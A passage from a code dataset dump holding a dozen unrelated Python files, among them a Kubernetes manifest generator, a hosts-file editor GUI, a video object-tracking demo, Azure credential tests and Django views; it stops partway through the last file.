spr_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\nelif season == \"Summer\":\n final_price = sum_rent - sum_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\nelif season == \"Autumn\":\n final_price = aut_rent - aut_rent * group_discount\nelif season == \"Winter\":\n final_price = win_rent - win_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\n\n\ndifference = budget - final_price\n\nif budget >= final_price:\n print(f\"Yes! You have {difference:.2f} leva left.\")\nelse:\n print(f\"Not enough money! 
You need {abs(difference):.2f} leva.\")","sub_path":"nested_ifs/lab_fishing_boat.py","file_name":"lab_fishing_boat.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"556538700","text":"import utils\n\n\nclass DeploymentYamlDirectEnvInfo:\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def yaml(self):\n template = ' ' * 8 + '- name: {0}\\n' + ' ' * 10 + 'value: {1}'\n return template.format(self.name, self.value)\n\n\nclass DeploymentYamlAnnotation:\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def yaml(self):\n template = ' ' * 8 + '{0}: {1}'\n return template.format(self.name, self.value)\n\n\nclass DeploymentYamlSecretEnvReference:\n def __init__(self, name, secretKey, secretName):\n self.name = name\n self.secretKey = secretKey\n self.secretName = secretName\n\n def yaml(self):\n template = ' ' * 8 + '- name: {0}\\n' + \\\n ' ' * 10 + 'valueFrom:\\n' + ' ' * 12 + 'secretKeyRef:\\n' + \\\n ' ' * 14 + 'key: {1}\\n' + ' ' * 14 + 'name: {2}'\n return template.format(self.name, self.secretKey, self.secretName)\n\n\nclass DeploymentYamlVolume:\n def __init__(self, name, claimName, mountPath):\n self.name = name\n self.claimName = claimName\n self.mountPath = mountPath\n\n def volumeMountYaml(self):\n template = ' ' * 8 + '- mountPath: {0}\\n' + ' ' * 10 + 'name: {1}'\n return template.format(self.mountPath, self.name)\n\n def volumeYaml(self):\n template = ' ' * 6 + '- name: {0}\\n' + ' ' * \\\n 8 + 'persistentVolumeClaim:\\n' + ' ' * 10 + 'claimName: {1}'\n return template.format(self.name, self.claimName)\n\n\nclass DeploymentYamlInfo:\n __template = '''apiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: {0}\n namespace: {1}\nspec:\n selector:\n matchLabels:\n app: {2}\n replicas: 1\n template:\n metadata:\n labels:\n app: {2}\n{5}\n spec:\n containers:\n - name: {3}\n image: {4}\n imagePullPolicy: Always{11}{12}\n env:\n{6}{7}{8}\n imagePullSecrets:\n - name: {9}\n nodeSelector: \n node-tag: {10}'''\n\n __livenessProbeTemplate_InformationExtraction = '''\n livenessProbe:\n exec:\n command:\n - env\n - \"PYTHONPATH=/app\"\n - python3.8\n - /app/package/healthcheck/general.py\n initialDelaySeconds: 60\n periodSeconds: 60\n timeoutSeconds: 5\n failureThreshold: 2'''\n\n def __init__(self, name, namespace, selectorLabel, containerName, image, imagePullSecret, nodeTag, annotations, envs, volumes, needPrivilegedPermission, livenessProbe):\n self.name = name\n self.namespace = namespace\n self.selectorLabel = selectorLabel\n self.containerName = containerName\n self.image = image\n self.imagePullSecret = imagePullSecret\n self.nodeTag = nodeTag\n self.annotations = annotations\n self.envs = envs\n self.volumes = volumes\n if needPrivilegedPermission is not None and needPrivilegedPermission:\n self.needPrivilegedPermission = True\n else:\n self.needPrivilegedPermission = False\n\n if livenessProbe is None or len(livenessProbe) == 0:\n self.livenessProbeTemplate = ''\n elif livenessProbe == 'information_extraction_livenessProbe':\n self.livenessProbeTemplate = self.__livenessProbeTemplate_InformationExtraction\n\n def create(self, fileName):\n utils.createDirForFile(fileName)\n targetFile = open(fileName, 'w', encoding='utf-8')\n\n annotations_value = ''\n if self.annotations is not None:\n annotations_value = ' annotations:\\n'\n annotation_count = len(self.annotations)\n for index, annotation in enumerate(self.annotations):\n 
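The deploymentYaml classes above render Kubernetes YAML purely with string templates; evaluating the direct-env template on sample values shows the indentation the format string encodes:

```python
# same template as DeploymentYamlDirectEnvInfo.yaml() in the record above
template = ' ' * 8 + '- name: {0}\n' + ' ' * 10 + 'value: {1}'
print(template.format('LOG_LEVEL', 'debug'))
#         - name: LOG_LEVEL
#           value: debug
```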
temp_annotation = annotation.yaml()\n                if index < annotation_count - 1:\n                    temp_annotation += '\\n'\n                annotations_value += temp_annotation\n\n        envs_value = ''\n        for index, oneEnv in enumerate(self.envs):\n            temp_env = oneEnv.yaml()\n            if index < (len(self.envs) - 1):\n                temp_env += '\\n'\n            envs_value += temp_env\n\n        volumeMountsYaml = ''\n        volumesYaml = ''\n\n        if self.volumes is not None:\n            volumeMountsYaml = '\\n        volumeMounts:\\n'\n            volumesYaml = '\\n      volumes:\\n'\n\n            for index, oneVolume in enumerate(self.volumes):\n                temp_volumeMount = oneVolume.volumeMountYaml()\n                temp_volume = oneVolume.volumeYaml()\n                if index < (len(self.volumes) - 1):\n                    temp_volumeMount += '\\n'\n                    temp_volume += '\\n'\n                volumeMountsYaml += temp_volumeMount\n                volumesYaml += temp_volume\n\n        if self.needPrivilegedPermission:\n            securityContext = '''\n        securityContext:\n          allowPrivilegeEscalation: true\n          capabilities: {}\n          privileged: true\n          procMount: Default\n          readOnlyRootFilesystem: false\n          runAsNonRoot: false'''\n        else:\n            securityContext = ''\n\n        targetFile.write(self.__template.format(self.name,\n                                                self.namespace,\n                                                self.selectorLabel,\n                                                self.containerName,\n                                                self.image,\n                                                annotations_value,\n                                                envs_value,\n                                                volumeMountsYaml,\n                                                volumesYaml,\n                                                self.imagePullSecret,\n                                                self.nodeTag,\n                                                securityContext,\n                                                self.livenessProbeTemplate))\n        return\n","sub_path":"deploy-script/k8s/deploymentYaml.py","file_name":"deploymentYaml.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"254371954","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''Spot data importer'''\n# Imports spot data from Wind into the data warehouse\n#\n# Created by Shengying Pan, 2016\nimport dateutil.parser\nimport asyncio\nimport aiohttp\nimport json\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom importererrors import WindError\nfrom importererrors import ServerError\nfrom serverutilities import get_classification\nfrom serverutilities import create_classification_for_product\nfrom serverutilities import get_last_day\nfrom windutilities import get_spot_quotes\n\nclass SpotImporter:\n    '''class to import spot data'''\n    def __init__(self, loop, wind, config):\n        '''constructor'''\n        self.loop = loop\n        self.wind = wind\n        self.config = config\n    def run(self):\n        '''main function to import data'''\n        # the config keys below ('国内现货日价格' = domestic daily spot price,\n        # '国外现货日价格' = foreign daily spot price) must match config.json,\n        # so they are left untranslated\n        print('Processing product spot prices')\n        today = datetime.now()\n        print('Today is', today.strftime('%Y-%m-%d'))\n        assets = self.config['spots']['国内现货日价格']\n        for asset in dict.keys(assets):\n            print('Processing commodity ' + asset)\n            items = assets[asset]\n            tasks = []\n            for item in items:\n                tasks.append(asyncio.ensure_future(self.process_item('国内现货日价格', asset, item)))\n            try:\n                self.loop.run_until_complete(asyncio.wait(tasks))\n            except:\n                print('Loop raised an exception while processing domestic spot price data for ' + asset)\n\n        assets = self.config['spots']['国外现货日价格']\n        for asset in dict.keys(assets):\n            print('Processing commodity ' + asset)\n            items = assets[asset]\n            tasks = []\n            for item in items:\n                tasks.append(asyncio.ensure_future(self.process_item('国外现货日价格', asset, item)))\n            try:\n                self.loop.run_until_complete(asyncio.wait(tasks))\n            except:\n                print('Loop raised an exception while processing foreign spot price data for ' + asset)\n\n    async def upload_item(self, asset, item):\n        '''uploads the spot quotes of a product'''\n        item_name = asset + item['origin'] + item['specs']\n        last_day = None\n        try:\n            last_day = await get_last_day('spot', item['wind_id'], self.config)\n        except ServerError as err:\n            raise err\n\n\n        today = datetime.now().strftime('%Y-%m-%d')\n        start_date = self.config['spots']['start']\n\n        if last_day is not None:\n            one_day = timedelta(days=1)\n            start_date = (last_day + one_day).strftime('%Y-%m-%d')\n\n        data = None\n        try:\n            data = await get_spot_quotes(item['wind_id'], start_date, today, self.wind)\n        except WindError as err:\n            raise err\n\n        async with aiohttp.ClientSession() as session:\n            url = self.config['server']['urls']['base']\n            url = url + self.config['server']['urls']['spot'] + '/' + item['wind_id']\n            params = {'jwt': self.config['user']['jwt']}\n            headers = {'content-type': 'application/json'}\n            payload = {\n                'wind': data\n            }\n            response = None\n            result = None\n            status = None\n            try:\n                response = await session.post(url, params=params, \\\n                    headers=headers, data=json.dumps(payload))\n                result = await response.json()\n                status = response.status\n            except:\n                raise ServerError(-1, 'cannot connect to the database service')\n            finally:\n                if response is not None:\n                    response.release()\n\n            if status > 200:\n                message = 'Upload of data for ' + item_name + ' failed, error: ' + \\\n                    json.dumps(result)\n                raise ServerError(status, message)\n            else:\n                print('Upload of data for ' + item_name + ' complete, server returned ' + json.dumps(result))\n            return True\n\n\n    async def process_item(self, keyword, asset, item):\n        '''process a single item'''\n        item_name = asset + item['origin'] + item['specs']\n        print('Start processing product ' + item_name)\n        classification = None\n        try:\n            classification = await get_classification(item['wind_id'], self.config)\n        except ServerError as err:\n            print('Failed to fetch classification info for ' + item_name + ': ' + str(err))\n            return False\n\n        if classification is None:\n            try:\n                classification = await create_classification_for_product(keyword, asset, item, self.config)\n            except ServerError as err:\n                print('Failed to create classification info for ' + item_name + ': ' + str(err))\n                return False\n\n        try:\n            return await self.upload_item(asset, item)\n        except ServerError as err:\n            print('Spot price upload failed for ' + item_name + ': ' + str(err))\n            return False\n        except WindError as err:\n            print('Failed to fetch Wind data for ' + item_name + ': ' + str(err))\n            return False\n\n        return True","sub_path":"importer/spotimporter.py","file_name":"spotimporter.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426343773","text":"# Dec 28\nimport numpy as np\n# Enter with spaces\nm, n = map(int, input(\"Enter number of rows and columns \").split())\nflag = True\nmat = np.zeros((m, n), dtype=int)\nfor i in range(m):\n    for j in range(n):\n        mat[i, j] = int(input())\nfor i in range(m-1):\n    for j in range(n-1):\n        if mat[i, j] != mat[i+1, j+1]:\n            flag = False\n            break\n    if not flag:\n        break\nprint(mat)\nif flag:\n    print(\"Identical diagonals\")\nelse:\n    print(\"Diagonals are non-identical\")\n\n# SAMPLE I/O\n# Enter number of rows and columns 3 4\n# 7\n# 4\n# 6\n# 8\n# 1\n# 7\n# 4\n# 6\n# 9\n# 1\n# 7\n# 4\n# [[7 4 6 8]\n#  [1 7 4 6]\n#  [9 1 7 4]]\n# Identical diagonals\n","sub_path":"December-28/python_drstrange11.py","file_name":"python_drstrange11.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"569856353","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import *\nimport sys\nimport os\nfrom main1 import Ui_MainWindow\nfrom PyQt5.QtCore import pyqtSignal\nfrom excluded import Excluded\n\n\nclass MyApp(QtWidgets.QMainWindow):\n    excludes = pyqtSignal(list)\n    global HOST\n\n    if sys.platform.startswith('linux') or sys.platform == 'darwin':\n        HOST = \"/etc/hosts\"\n    else:\n        HOST = \"C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\"\n\n    def __init__(self):\n        super(MyApp, self).__init__()\n        self.ui = 
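main.py's init_ui() above keeps only meaningful hosts entries and normalizes trailing newlines; the same filter in isolation (slightly generalized here: any whitespace-only line is skipped, not just a bare newline):

```python
def host_lines(lines):
    out = []
    for line in lines:
        # skip blank lines and comments; ensure every kept line ends in '\n'
        if line.strip() == '' or line.startswith('#'):
            continue
        out.append(line if line.endswith('\n') else line + '\n')
    return out

print(host_lines(['# comment\n', '\n', '127.0.0.1 localhost']))
# ['127.0.0.1 localhost\n']
```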
Ui_MainWindow()\n self.ui.setupUi(self)\n self.window = Excluded(self.excludes)\n self.init_ui()\n self.ui.addBtn.clicked.connect(self.add_host)\n self.ui.deleteBtn.clicked.connect(self.delete_host)\n self.ui.excludeBtn.clicked.connect(self.exclude_host)\n self.ui.removeFromExclude.clicked.connect(self.open_excludes)\n self.window.includes[list].connect(self.init_ui)\n\n def init_ui(self):\n self.setFixedSize(475, 372)\n self.setWindowTitle('Host Reader')\n lines = []\n exists = os.path.isfile('hosts.bak')\n if not exists:\n with open(HOST, 'r') as f:\n back_up = f.readlines()\n for backUpLine in back_up:\n with open('hosts.bak', 'a') as w:\n w.write(backUpLine)\n with open(HOST, 'r') as hr:\n items = hr.readlines()\n for line in items:\n if len(line) == 1 and line.find('\\n') != -1:\n continue\n elif line.startswith('#'):\n continue\n elif line.find('\\n') == -1:\n line += '\\n'\n lines.append(line)\n\n self.ui.hostBrowser.clear()\n self.ui.hostBrowser.setSelectionMode(QListWidget.ExtendedSelection)\n self.ui.hostBrowser.addItems(lines)\n self.ui.hostBrowser.scrollToBottom()\n self.ui.hostBrowser.show()\n self.show()\n\n def open_excludes(self):\n self.window.show()\n\n def add_host(self):\n text = self.ui.hostEditor.toPlainText()\n with open(HOST, 'a') as f:\n f.write(text + '\\n')\n for line in text.split('\\n'):\n self.ui.hostBrowser.addItem(line + '\\n')\n self.ui.hostEditor.clear()\n self.ui.hostBrowser.scrollToBottom()\n self.ui.hostBrowser.show()\n\n def exclude_host(self):\n list_items = self.ui.hostBrowser.selectedItems()\n if not list_items: return\n exclude_list = []\n for item in list_items:\n with open(HOST, 'r') as f:\n host_lines = f.readlines()\n with open(HOST, 'w') as f:\n for hostLine in host_lines:\n if hostLine.strip('\\n') == item.text().strip('\\n'):\n f.write('#HE ' + hostLine)\n else:\n f.write(hostLine)\n exclude_list.append(item.text())\n self.ui.hostBrowser.takeItem(self.ui.hostBrowser.row(item))\n self.excludes.emit(exclude_list)\n\n def delete_host(self):\n list_items = self.ui.hostBrowser.selectedItems()\n if not list_items: return\n for item in list_items:\n print(item.text())\n with open(HOST, 'r') as f:\n host_lines = f.readlines()\n with open(HOST, 'w') as f:\n for line in host_lines:\n if line.strip(\"\\n\") != item.text().strip(\"\\n\"):\n f.write(line)\n self.ui.hostBrowser.takeItem(self.ui.hostBrowser.row(item))\n self.ui.hostBrowser.scrollToBottom()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MyApp()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3284347","text":"from rencode import dumps, loads\r\n\r\nclass states:\r\n\t'''states used by the server / client\r\n\t'''\r\n\t\r\n\tstates = {\r\n\t'new_connection':0,\r\n\t'remove_connection':1,\r\n\t'limit_connection':2,\r\n\t'ping_connection':3,\r\n\t'established_connection':4,\r\n\t\t\t} \r\n\t\r\nclass rpcCommands:\r\n\tpermitted_commands = {\r\n\t\t'print' : 'print({})',\r\n\t\t'update' : '#send client names',\r\n\t\t'pause' : None,\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\r\n\tdef execute(command):\r\n\t\tpass\r\n\t\r\nclass entity:\r\n\t'''a client entity\r\n\t'''\r\n\tdef __init__(self, name, cid, ip, timeout):\r\n\t\tself.name = name\r\n\t\tself.cid = cid\r\n\t\tself.ip = ip\r\n\t\tself.timeout = timeout #0 is the time last received, #1 is the difference\r\n\t\tself.latency = [0, 
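classes.py above wraps rencode's dumps/loads; assuming the third-party `rencode` package is installed, the packer simply round-trips plain Python values:

```python
from rencode import dumps, loads

blob = dumps({'cid': 7, 'state': 4})  # compact binary encoding
print(loads(blob))                     # the original mapping back
```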
100, 100]\r\n\t\t\t\r\nclass packer:\r\n\t'''how data is packed / unpacked\r\n\t'''\r\n\r\n\tdef pack(data):\r\n\t\t'''packs data for socket\r\n\t\t'''\r\n\t\treturn dumps(data)\r\n\t\t\t\r\n\tdef unpack(data):\r\n\t\t'''unpacks data from socket\r\n\t\t'''\r\n\t\treturn loads(data)","sub_path":"3/blender/Multiplayer/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"76055644","text":"# declare\ncliente=\"\"\nproducto=\"\"\ncantidad=0\ncostodeunidad=0.0\ncliente=str(input(\"enter the client's name:\"))\nproducto=str(input(\"enter the product name:\"))\ncantidad=int(input(\"enter the quantity:\"))\ncostodeunidad=float(input(\"enter the unit cost:\"))\n# processing\ntotal=cantidad*costodeunidad\nif(total>150000):\n    print(\"demanding buyer\")\nelse:\n    print(\"not a demanding buyer\")\n# end-if\n","sub_path":"rojas_baturen/EJERCICIO047.py","file_name":"EJERCICIO047.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"556538700","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport logging\nimport os\nimport os.path as osp\nfrom opts import opts\nfrom tracking_utils.utils import mkdir_if_missing\nfrom tracking_utils.log import logger\nimport dataloader as datasets\nimport torch\nimport cv2\nfrom tracker.multitrackercam4 import JDETracker\nfrom tracking_utils.timer import Timer\nfrom tracking_utils import visualization as vis\nfrom PIL import Image\nfrom utils.bb_polygon import load_zone_anno\nimport numpy as np\nimport copy\ndef eval_seq(opt, dataloader,polygon, paths, data_type, result_filename, frame_dir=None,save_dir=None,bbox_dir=None, show_image=True, frame_rate=30):\n    count=0\n    if save_dir:\n        mkdir_if_missing(save_dir)\n    if bbox_dir:\n        mkdir_if_missing(bbox_dir)\n    if frame_dir:\n        mkdir_if_missing(frame_dir)\n    tracker = JDETracker(opt,polygon, paths, frame_rate=frame_rate)\n    timer = Timer()\n    results = []\n    frame_id = 1\n    \n    f = open(opt.input_video.split('/')[-1][:-4] + '.txt', 'w' )\n\n    for path, img, img0 in dataloader:\n        img0_clone=copy.copy(img0)\n        if frame_id % 1 == 0:\n            logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1. 
/ max(1e-5, timer.average_time)))\n \n\n # run tracking\n timer.tic()\n blob = torch.from_numpy(img).cuda().unsqueeze(0) if opt.gpus[0]>=0 else torch.from_numpy(img).cpu().unsqueeze(0)\n online_targets,detection_boxes,out_of_polygon_tracklet = tracker.update(blob, img0)\n if len(out_of_polygon_tracklet)>0:\n for track in np.asarray(out_of_polygon_tracklet)[:,2]:\n if track in ['person','bicycle', 'motorcycle']:\n count+=1\n print('count : '+str(count))\n online_tlwhs = []\n online_ids = []\n \n for t in online_targets:\n tlwh = t.tlwh\n tid = t.track_id\n if tlwh[2] * tlwh[3] > opt.min_box_area :\n online_tlwhs.append(tlwh)\n online_ids.append(tid)\n \n #bbox detection plot \n box_tlbrs=[]\n box_scores=[]\n box_classes=[]\n box_occlusions=[]\n img_bbox=img0.copy()\n for box in detection_boxes:\n tlbr=box.tlbr\n tlwh=box.tlwh\n vertical = tlwh[2] / tlwh[3] > 1.6\n if tlwh[2] * tlwh[3] > opt.min_box_area:\n box_tlbrs.append(tlbr)\n box_scores.append(box.score)\n box_classes.append(box.infer_type())\n box_occlusions.append('occ' if box.occlusion_status==True else 'non_occ')\n\n timer.toc()\n # save results\n for track in out_of_polygon_tracklet:\n frame_idx,id,classes,movement=track\n results.append((opt.input_video.split('/')[-1][:-4],frame_idx , classes, movement))\n f.write(','.join([opt.input_video.split('/')[-1][:-4], str(frame_idx), str(classes), str(movement)])+ '\\n')\n if show_image or save_dir is not None:\n online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,\n fps=1. / timer.average_time,out_track=out_of_polygon_tracklet)\n bbox_im=vis.plot_detections(img_bbox,box_tlbrs,scores=box_scores,box_occlusion=None,btypes=box_classes)\n if show_image:\n cv2.polylines(online_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(bbox_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(img0_clone,[np.asarray(polygon)],True,(0,255,255))\n cv2.imshow('online_im', online_im)\n cv2.imshow('bbox_im',bbox_im)\n if save_dir is not None:\n cv2.polylines(online_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(bbox_im,[np.asarray(polygon)],True,(0,255,255))\n cv2.polylines(img0_clone,[np.asarray(polygon)],True,(0,255,255))\n cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)\n cv2.imwrite(os.path.join(bbox_dir, '{:05d}.jpg'.format(frame_id)), bbox_im)\n cv2.imwrite(os.path.join(frame_dir, '{:05d}.jpg'.format(frame_id)),img0_clone)\n\n frame_id += 1\n # save results\n \n return frame_id, timer.average_time, timer.calls\n\ndef demo(opt):\n result_root = opt.output_root if opt.output_root != '' else '.'\n mkdir_if_missing(result_root)\n\n logger.info('Starting tracking...')\n dataloader = datasets.LoadVideo(opt.input_video, opt.img_size)\n polygon, paths=load_zone_anno(opt.input_meta)\n result_filename = os.path.join(result_root, 'results.txt')\n frame_rate = dataloader.frame_rate\n\n frame_tracking_dir = None if opt.output_format == 'text' else osp.join(result_root, 'frame_tracking')\n bbox_dir = None if opt.output_format == 'text' else osp.join(result_root, 'bbox_detection')\n frame_dir = None if opt.output_format == 'text' else osp.join(result_root, 'frame_dir')\n eval_seq(opt, dataloader,polygon, paths, 'mot', result_filename, frame_dir=frame_dir,save_dir=frame_tracking_dir,bbox_dir=bbox_dir, show_image=False, frame_rate=frame_rate)\n\n if opt.output_format == 'video':\n output_video_path = osp.join(result_root, 'result.mp4')\n cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -b 5000k -c:v mpeg4 {}'.format(osp.join(result_root, 
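demo() above shells out to ffmpeg via os.system; a sketch of the same invocation through subprocess, which avoids shell quoting issues (the paths are placeholders, and newer ffmpeg builds may prefer -b:v over the record's bare -b):

```python
import subprocess

cmd = ['ffmpeg', '-f', 'image2', '-i', 'results/frame/%05d.jpg',
       '-b', '5000k', '-c:v', 'mpeg4', 'results/result.mp4']
# subprocess.run(cmd, check=True)  # uncomment once the frame images exist
print(' '.join(cmd))
```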
'frame'), output_video_path)\n        os.system(cmd_str)\n\n\nif __name__ == '__main__':\n    opt = opts().init()\n    demo(opt)\n","sub_path":"HCMAICITYCHALLENGE/counting_demo.py","file_name":"counting_demo.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"519863717","text":"\"\"\"\nThis module implements a basic input data scheme.\n\"\"\"\n\nfrom Tkinter import *\nfrom vyapp.app import root\n\nclass Ask(Entry):\n    \"\"\"\n    This class implements vy's default input text scheme. Plugins that demand user input\n    can use this class to retrieve the user's data in a consistent way. When this class constructor\n    is called it shows an entry widget at the bottom of the vy editor.\n\n    The widget takes the focus when the constructor is called, which is useful\n    behavior in the common scenarios of the vy editor.\n\n    When the user presses <Escape> the widget is destroyed and the focus scheme\n    is restored. The same occurs when <Return> is pressed while the widget has focus.\n\n    Consider:\n\n    def handle(area):\n        ask = Ask(area)\n        if ask.data:\n            print 'Success!'\n        else:\n            print 'Failure!'\n\n    In case of success, i.e. if the user pressed <Return>, ask.data will be the user data\n    that was input; otherwise it is ''.\n    \"\"\"\n\n    def __init__(self, area, default_data ='', wait=True):\n        self.area = area\n        self.data = ''\n        self.frame = Frame(root.read_data, border=1, padx=3, pady=3)\n        self.frame.pack(expand=True, fill=X)\n\n        Entry.__init__(self, self.frame)\n        self.config(background='grey')\n\n        self.pack(side='left', expand=True, fill=BOTH)\n        self.focus_set()\n\n        # <Escape> cancels the prompt, <Return> accepts the input\n        self.bind('<Escape>', lambda event: self.restore_focus_scheme())\n        self.bind('<Return>', lambda event: self.on_success())\n\n        # It seems that if i put self.data = default_data\n        # after self.area.wait_window(self) it sets self.data\n        # after it has been set in self.on_success, and then i get\n        # the insert mark being reset to insert again.\n\n        self.insert('end', default_data)\n        root.read_data.pack(fill=X)\n\n        # It has to wait for self.frame otherwise it seems the marks\n        # added by Stdout, the code_mark stuff disappear.\n        # this was insanely crazy to find.\n        self.frame.grab_set()\n        if wait: self.area.wait_window(self.frame)\n\n    def on_success(self):\n        self.data = self.get()\n        self.restore_focus_scheme()\n\n    def restore_focus_scheme(self):\n        self.frame.destroy()\n        root.read_data.pack_forget()\n        self.area.focus_set()\n\n\n","sub_path":"vy-code/vyapp/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192823179","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom unittest import mock\n\nfrom azure.core.exceptions import HttpResponseError\nfrom azure.identity.aio._credentials.managed_identity import ImdsCredential\nimport pytest\n\nfrom helpers import mock_response\nfrom helpers_async import AsyncMockTransport, get_completed_future\n\n\n@pytest.mark.asyncio\nasync def test_no_scopes():\n    \"\"\"The credential should raise ValueError when get_token is called with no scopes\"\"\"\n\n    successful_probe = mock_response(status_code=400, json_payload={})\n    transport = mock.Mock(send=mock.Mock(return_value=get_completed_future(successful_probe)))\n    credential = ImdsCredential(transport=transport)\n\n    with pytest.raises(ValueError):\n        await credential.get_token()\n\n\n@pytest.mark.asyncio\nasync def 
test_multiple_scopes():\n \"\"\"The credential should raise ValueError when get_token is called with more than one scope\"\"\"\n\n successful_probe = mock_response(status_code=400, json_payload={})\n transport = mock.Mock(send=mock.Mock(return_value=get_completed_future(successful_probe)))\n credential = ImdsCredential(transport=transport)\n\n with pytest.raises(ValueError):\n await credential.get_token(\"one scope\", \"and another\")\n\n\n@pytest.mark.asyncio\nasync def test_imds_close():\n transport = AsyncMockTransport()\n\n credential = ImdsCredential(transport=transport)\n\n await credential.close()\n\n assert transport.__aexit__.call_count == 1\n\n\n@pytest.mark.asyncio\nasync def test_imds_context_manager():\n transport = AsyncMockTransport()\n credential = ImdsCredential(transport=transport)\n\n async with credential:\n pass\n\n assert transport.__aexit__.call_count == 1\n","sub_path":"sdk/identity/azure-identity/tests/test_imds_credential_async.py","file_name":"test_imds_credential_async.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"180031956","text":"# -*- coding: utf-8 -*- #\n# Copyright 2023 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Common classes and functions for organization firewall policy associations.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import exceptions as calliope_exceptions\n\n\ndef ConvertPriorityToInt(priority):\n try:\n int_priority = int(priority)\n except ValueError:\n raise calliope_exceptions.InvalidArgumentException(\n 'priority', 'priority must be a valid non-negative integer.'\n )\n if int_priority < 0:\n raise calliope_exceptions.InvalidArgumentException(\n 'priority', 'priority must be a valid non-negative integer.'\n )\n return int_priority\n","sub_path":"lib/googlecloudsdk/api_lib/compute/firewall_policy_association_utils.py","file_name":"firewall_policy_association_utils.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"383793517","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom mdata.models import Mdata\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom mdata.forms import MdataForm\n# Create your views here.\n\ndef hello(request):\n name = \"Priyank Jain\"\n html = \" Hi %s, This seems to have worked \" % name\n return HttpResponse(html)\n\ndef hello_template(request):\n name = \"Priyank\"\n t = get_template('hello.html')\n html = t.render(Context ({'name' : name }))\n return HttpResponse(html)\n \ndef hello_template_simple(request):\n name = \"Priyank\"\n return 
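ConvertPriorityToInt in the firewall-policy record validates in two steps (parse, then sign check); the same logic restated without the gcloud-specific exception type:

```python
def convert_priority(priority):
    try:
        value = int(priority)
    except ValueError:
        raise ValueError('priority must be a valid non-negative integer.')
    if value < 0:
        raise ValueError('priority must be a valid non-negative integer.')
    return value

print(convert_priority('100'))  # 100; '-5' or 'abc' would raise ValueError
```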
render_to_response('hello.html',{'name' : name})\n    \ndef mdatas(request):\n    language = 'en_us'\n    session_language ='en_us'\n    if 'lang' in request.COOKIES:\n        language = request.COOKIES['lang']\n\n    if 'lang' in request.session:\n        session_language = request.session['lang']\n    \n    args = {}\n    args.update(csrf(request))\n    \n    args['mdatas'] = Mdata.objects.all()\n    args['language'] = language\n    args['session_language'] = session_language\n    \n    return render_to_response('mdatas.html', args)\n    \ndef mdata(request,mdata_id=1):\n    return render_to_response('mdata.html',{'mdata' : Mdata.objects.get(id=mdata_id)})\n\ndef language(request, language='en-us'):\n    response = HttpResponse(\"setting language to %s\" % language)\n    response.set_cookie('lang', language)\n    request.session['lang'] = language\n    return response\n\ndef create(request):\n    if request.POST:\n        form = MdataForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return HttpResponseRedirect('/moviesdata/all')\n    else:\n        form = MdataForm()\n    c={}\n    c.update(csrf(request))\n    c['form'] = form\n    return render_to_response('create_mdata.html', c)\n    \ndef search_titles(request):\n    if request.method == 